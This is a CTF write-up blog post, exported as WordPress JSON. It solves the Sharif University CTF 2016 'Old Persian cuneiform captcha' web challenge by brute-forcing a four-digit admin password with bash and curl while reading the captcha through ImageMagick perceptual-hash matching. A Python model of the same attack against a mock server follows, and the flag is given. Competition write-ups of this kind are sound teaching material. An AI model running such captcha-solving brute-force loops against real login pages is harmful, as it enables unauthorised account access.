{"id":1817,"date":"2016-02-07T01:58:46","date_gmt":"2016-02-07T00:58:46","guid":{"rendered":"https:\/\/0x90r00t.com\/?p=1817"},"modified":"2016-02-07T14:49:46","modified_gmt":"2016-02-07T13:49:46","slug":"sharif-university-ctf-2016-web-250-old-persian-cuneiform-captcha-write-up","status":"publish","type":"post","link":"https:\/\/0x90r00t.com\/fr\/2016\/02\/07\/sharif-university-ctf-2016-web-250-old-persian-cuneiform-captcha-write-up\/","title":{"rendered":"[Sharif University CTF 2016] [Web 250 \u2013 Old persian cuneiform captcha] Write Up"},"content":{"rendered":"<blockquote>\n<h2>Description<\/h2>\n<p>Old Persian cuneiform is a semi-alphabetic cuneiform script that was the primary script for the Old Persian language. You could get more information on the following links:<br \/>\n1- http:\/\/www.ancientscripts.com\/oldpersian.html<br \/>\n2- https:\/\/en.wikipedia.org\/wiki\/Old_Persian_cuneiform<\/p>\n<p>A web-based collections management for a museum has some extremely valuable information if one has admin user access.<\/p>\n<p><a href=\"http:\/\/ctf.sharif.edu:32455\/chal\/oldpersian\/04b2dfb564086721\/\">The Site<\/a><\/p>\n<p>We found that the &quot;admin&quot; user has a 4-digit password. But they use a captcha made of 10 Old Persian characters. 
One has to use the correspondence between symbols and strings to pass the captcha verification (use &quot;trans.png&quot;).<br \/>\nLog in as &quot;admin&quot; to find the flag.<br \/>\nThe flag is in the format: [Your flag is: flagflagflag&#8230;] (without braces)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-1819\" src=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-1024x107.png\" alt=\"trans\" width=\"474\" height=\"50\" srcset=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-1024x107.png 1024w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-300x31.png 300w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-768x80.png 768w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans.png 1876w\" sizes=\"auto, (max-width: 474px) 100vw, 474px\" \/><\/p><\/blockquote>\n<p><!--more--><\/p>\n<h2>Resolution<\/h2>\n<p>This is a really simple challenge: a brute force over four digits \ud83d\ude42<br \/>\nLuckily they thought to add a captcha. It does not help much: the captcha is built from a fixed set of glyphs drawn without distortion, so each glyph can be recognised by comparing it with a reference image, and nothing limits the number of login attempts.<\/p>\n<p>Let&rsquo;s start with the brute-force code. After a few tests, the error messages are &quot;Login failed&quot; for a wrong password and &quot;Invalid captcha&quot; for a wrong captcha. This lets the script tell a misread captcha (retry the same password) from a wrong password (move on to the next one).<\/p>\n<p>We write a small bash loop that tries all 10000 possible passwords.<br \/>\nThe captcha value is obtained by a second script.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n#!\/bin\/bash\r\n# Brute force the 4-digit admin password; the captcha is read by .\/captcha.sh.\r\n# The same PHPSESSID is sent with every request so that the captcha we solved\r\n# and the login attempt belong to the same server-side session.\r\n\r\nfor passwd in {0000..9999}\r\ndo\r\n  caperror=1\r\n  while [ &quot;$caperror&quot; = 1 ]\r\n  do\r\n    rm -f *.jpg                  # tiles left by the previous captcha\r\n    captcha=$(.\/captcha.sh)\r\n    res=$(curl --retry 1000000 --connect-timeout 1 -s -L -b PHPSESSID=515386866780b5f132fc96c02b3ddb82 --data &quot;username=admin&amp;password=$passwd&amp;captcha=$captcha&quot; &quot;http:\/\/ctf.sharif.edu:32455\/chal\/oldpersian\/04b2dfb564086721\/login\/submit\/&quot;)\r\n    # a misread captcha is not a wrong password: fetch a new one and retry this password\r\n    echo &quot;$res&quot; | grep -q &quot;Invalid captcha&quot; || caperror=0\r\n  done\r\n  # anything other than &quot;Login failed&quot; is the success page, which carries the flag\r\n  echo &quot;$res&quot; | grep -q &quot;Login failed&quot; || echo &quot;$passwd : $res&quot;\r\n  echo &quot;test : $passwd&quot;\r\ndone\r\n<\/pre>\n<p>Now for the script that reads the captcha. For this we put an image of each letter in the conv directory.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1820\" src=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/conv-300x198.png\" alt=\"conv\" width=\"300\" height=\"198\" srcset=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/conv-300x198.png 300w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/conv.png 598w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Then we use the compare program from the ImageMagick suite with the phash metric.<br \/>\nIt returns a number expressing the difference between the two images (the distance between their perceptual hashes): close to 0 for the same glyph, larger for different ones.<\/p>\n<p>Ex1: different images.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\ncompare -metric phash 1-0.jpg conv\/A.jpg NULL: 2&gt;&amp;1\r\n6.76925\r\n<\/pre>\n<p>Ex2: nearly identical images.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\ncompare -metric phash 1-0.jpg conv\/F.jpg NULL: 2&gt;&amp;1\r\n0.0121092\r\n<\/pre>\n<p>And here is the captcha script:<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n#!\/bin\/bash\r\n# Fetch a captcha in the session used by the brute-force loop and print its 10 characters.\r\ncurl --retry 1000000 --connect-timeout 1 -b PHPSESSID=515386866780b5f132fc96c02b3ddb82 -s &quot;http:\/\/ctf.sharif.edu:32455\/chal\/oldpersian\/04b2dfb564086721\/captcha\/&quot; &gt; 1.jpg\r\nmogrify -crop 80x80 +repage 1.jpg   # 10 glyphs of 80x80 px side by side -&gt; tiles 1-0.jpg ... 1-9.jpg\r\n\r\nfor char in 1-[0-9].jpg             # tiles in left-to-right order\r\ndo\r\n  for ref in conv\/*.jpg             # one reference image per letter\r\n  do\r\n    # a phash distance below 1 means the tile is this glyph: print its letter and go to the next tile\r\n    compare -metric phash &quot;$char&quot; &quot;$ref&quot; NULL: 2&gt;&amp;1 | grep -qE '^0(\\.[0-9]+)?$' &amp;&amp; { echo -n &quot;$(basename &quot;$ref&quot; .jpg)&quot;; break; }\r\n  done\r\ndone\r\n<\/pre>\n<p>If a tile matches no reference image, nothing is printed for it, the login returns &quot;Invalid captcha&quot; and the brute-force loop simply fetches a new captcha for the same password.<\/p>\n<p>All that&rsquo;s left is to launch the brute-force script and&#8230; move on to something else.<\/p>\n<pre class=\"brush: plain; light: true; title: ; notranslate\" title=\"\">\r\ntest : 0000\r\ntest : 0001\r\n...\r\ntest : 7473\r\ntest : 7474\r\ntest : 7475\r\n7476 : Your flag is: 1a5bfab77002fc17e996ef292199885b\r\n<\/pre>\n<p>The validation flag is: 1a5bfab77002fc17e996ef292199885b<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description Old Persian cuneiform is a semi-alphabetic cuneiform script that was the primary script for the old persian language. You could get more information on following links, 1- http:\/\/www.ancientscripts.com\/oldpersian.html 2- https:\/\/en.wikipedia.org\/wiki\/Old_Persian_cuneiform.A web-based collections management for a museum has some extremely valuable information if one has admin user access. The Site We found that the \u00ab\u00a0admin\u00a0\u00bb &hellip; <a href=\"https:\/\/0x90r00t.com\/fr\/2016\/02\/07\/sharif-university-ctf-2016-web-250-old-persian-cuneiform-captcha-write-up\/\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">[Sharif University CTF 2016] [Web 250 \u2013 Old persian cuneiform captcha] Write Up<\/span>  <span 
class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[130,35,135],"tags":[128,134,38,133,19],"class_list":["post-1817","post","type-post","status-publish","format-standard","hentry","category-2016-fr","category-ctf-fr","category-sharif-fr","tag-2016-fr","tag-captcha","tag-ctf-fr","tag-sharif","tag-web"],"_links":{"self":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1817","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/comments?post=1817"}],"version-history":[{"count":24,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1817\/revisions"}],"predecessor-version":[{"id":1879,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1817\/revisions\/1879"}],"wp:attachment":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/media?parent=1817"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/categories?post=1817"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/tags?post=1817"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
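The attack described in the write-up, modelled end to end as an added example (this is not the original post's code): a template-matching captcha reader doing the job of captcha.sh, and the retry-aware brute-force loop doing the job of the bash loop. Everything it runs against is constructed: the glyph bitmaps are deterministic pseudo-random 16x16 patterns standing in for the Old Persian tiles, a simple block hash stands in for ImageMagick's phash metric, the MockMuseum class replaces the challenge server, and the glyph names A..J, the admin password "0217" and the flag text are assumptions made for the demo.

```python
import random

TILE = 16             # each glyph is a TILE x TILE bitmap (the real tiles were 80x80)
HASH_SIDE = 8         # a tile is averaged down to 8x8 blocks -> 64-bit hash
MATCH_THRESHOLD = 6   # max Hamming distance accepted as "same glyph" (assumption)
NOISE_PER_TILE = 3    # pixels the mock server flips in every tile (constructed noise)
ALPHABET = "ABCDEFGHIJ"   # constructed glyph names, like the author's conv/ files


def make_glyph(name):
    """Constructed glyph: a deterministic pseudo-random TILE x TILE 0/1 bitmap."""
    rng = random.Random("glyph-" + name)
    return [[rng.randint(0, 1) for _ in range(TILE)] for _ in range(TILE)]


# Reference set, the equivalent of the author's conv/ directory.
GLYPHS = {name: make_glyph(name) for name in ALPHABET}


def render_strip(letters, noise_seed=0):
    """Constructed captcha: the glyphs side by side, with NOISE_PER_TILE pixels
    flipped in each tile so that tiles never equal the references exactly."""
    rng = random.Random(noise_seed)
    strip = [sum((GLYPHS[c][y][:] for c in letters), []) for y in range(TILE)]
    for i in range(len(letters)):
        for _ in range(NOISE_PER_TILE):
            y, x = rng.randrange(TILE), i * TILE + rng.randrange(TILE)
            strip[y][x] ^= 1
    return strip


def crop_tiles(strip, size=TILE):
    """Same job as 'mogrify -crop 80x80 +repage': cut the strip into tiles, left to right."""
    width = len(strip[0])
    return [[row[x:x + size] for row in strip] for x in range(0, width, size)]


def block_hash(tile):
    """Simplified perceptual hash (stand-in for phash): average the tile down to
    HASH_SIDE x HASH_SIDE blocks, one bit per block with at least half ink."""
    step = len(tile) // HASH_SIDE
    bits = 0
    for by in range(HASH_SIDE):
        for bx in range(HASH_SIDE):
            ink = sum(tile[y][x]
                      for y in range(by * step, (by + 1) * step)
                      for x in range(bx * step, (bx + 1) * step))
            bits = (bits << 1) | (1 if 2 * ink >= step * step else 0)
    return bits


def hamming(a, b):
    """Distance between two hashes: number of differing bits."""
    return bin(a ^ b).count("1")


REFERENCE_HASHES = {name: block_hash(bmp) for name, bmp in GLYPHS.items()}


def solve_captcha(strip):
    """Read the captcha: per tile, the reference glyph with the smallest hash
    distance. A tile close to nothing is a solver failure (bad crop, unknown
    glyph): raise so the caller fetches a new captcha instead of guessing."""
    answer = []
    for tile in crop_tiles(strip):
        h = block_hash(tile)
        name, dist = min(((n, hamming(h, rh)) for n, rh in REFERENCE_HASHES.items()),
                         key=lambda pair: pair[1])
        if dist > MATCH_THRESHOLD:
            raise ValueError(f"unrecognised glyph, best distance {dist}")
        answer.append(name)
    return "".join(answer)


class MockMuseum:
    """Constructed stand-in for the challenge site: 4-digit admin password, a
    10-glyph captcha tied to the session, and the two error strings the
    write-up greps for. Password and flag text are assumptions."""

    def __init__(self, password="0217", seed=1):
        self._password = password
        self._rng = random.Random(seed)
        self._expected = None          # captcha answer for the current session

    def captcha(self):
        letters = [self._rng.choice(ALPHABET) for _ in range(10)]
        self._expected = "".join(letters)
        return render_strip(letters, noise_seed=self._rng.randrange(1 << 30))

    def login_submit(self, username, password, captcha):
        if captcha != self._expected:
            return "Invalid captcha"
        self._expected = None          # every attempt needs a fresh captcha
        if username != "admin" or password != self._password:
            return "Login failed"
        return "Your flag is: demo-flag"


def brute_force(server, captcha_retries=3):
    """The write-up's loop: try 0000..9999; on 'Invalid captcha' re-solve and
    resubmit the same password; anything but 'Login failed' is the flag page."""
    for n in range(10000):
        passwd = f"{n:04d}"
        for _ in range(captcha_retries):
            try:
                answer = solve_captcha(server.captcha())
            except ValueError:
                continue                          # unreadable captcha: get another
            res = server.login_submit("admin", passwd, answer)
            if res != "Invalid captcha":
                break
        else:
            raise RuntimeError(f"captcha solver keeps failing at {passwd}")
        if res != "Login failed":
            return passwd, res
    return None
```

`brute_force(MockMuseum())` returns `("0217", "Your flag is: demo-flag")`. The point the model makes explicit is that the captcha adds no entropy to the login, only latency: because the glyph set is fixed and the server distinguishes "Invalid captcha" from "Login failed", a misread captcha costs one extra request and never burns a password candidate, so the attacker's cost is the solver's throughput over 10000 attempts.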